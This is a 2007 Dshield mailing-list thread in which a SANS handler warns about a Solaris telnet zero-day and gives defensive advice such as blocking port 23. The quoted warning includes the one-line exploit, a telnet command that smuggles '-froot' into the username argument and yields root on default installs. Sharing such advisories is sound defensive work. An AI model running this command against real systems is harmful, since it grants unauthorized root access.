[Dshield] Solaris Telnet 0-day (Important!)

Jim McCullough jim.mccullough at gmail.com
Mon Feb 12 03:23:22 GMT 2007

Unfortunately slowlaris.. uh Solaris comes default with it still
turned on iirc.  Still installed on most linux distrobutions.   But
luckily it is turned off.   I wonder if someone at Sun needs a dose of
clue bat?

On 2/11/07, Gadi Evron <ge at linuxbox.org> wrote:
> On Sun, 11 Feb 2007, Brendan Dolan-Gavitt wrote:
> > WOW that's a stupid hole :) The same bug was found in rlogin in AIX
> > sometime around 1994  (see
> > http://www.cert.org/advisories/CA-1994-09.html for details). If
> > Solaris 10 & 11 are truly vulnerable to this bug, Sun deserves a
> > *swift* kick to the head.
>
> Yeah, they still come with telnet installed?
>

> > -Brendan
> >
> > On 2/11/07, Johannes B. Ullrich <jullrich at sans.org> wrote:
> > >
> > > If you run Solaris, please check if you got telnet enabled NOW. If you
> > > can, block port 23 at your perimeter. There is a fairly trivial Solaris
> > > telnet 0-day.
> > >
> > > telnet -l "-froot" [hostname]
> > >
> > > will give you root on many Solaris systems with default installs
> > > We are still testing. Please use our contact form at
> > > https://isc.sans.org/contact.html
> > > if you have any details about the use of this exploit.
> > >

> > > --
> > > ---------
> > > Johannes Ullrich                        http://isc.sans.org
> > >
> > > SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> > > taught by our top rated instructors plus a huge vendor tools expo.
> > >         Register Today! <http://www.sans.org/info/2501>
> > > (Brochurecode: ISC)
> > >
> > > PGP Key: https://secure.dshield.org/PGPKEYS

> > > SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> > > taught by our top rated instructors plus a huge vendor tools expo.
> > > Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)

> > SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> > taught by our top rated instructors plus a huge vendor tools expo.
> > Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)

> SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> taught by our top rated instructors plus a huge vendor tools expo.

Jim McCullough

"Just because the standard provides a cliff in front of you, you are
not necessarily required to jump off it."

    Norman Diamond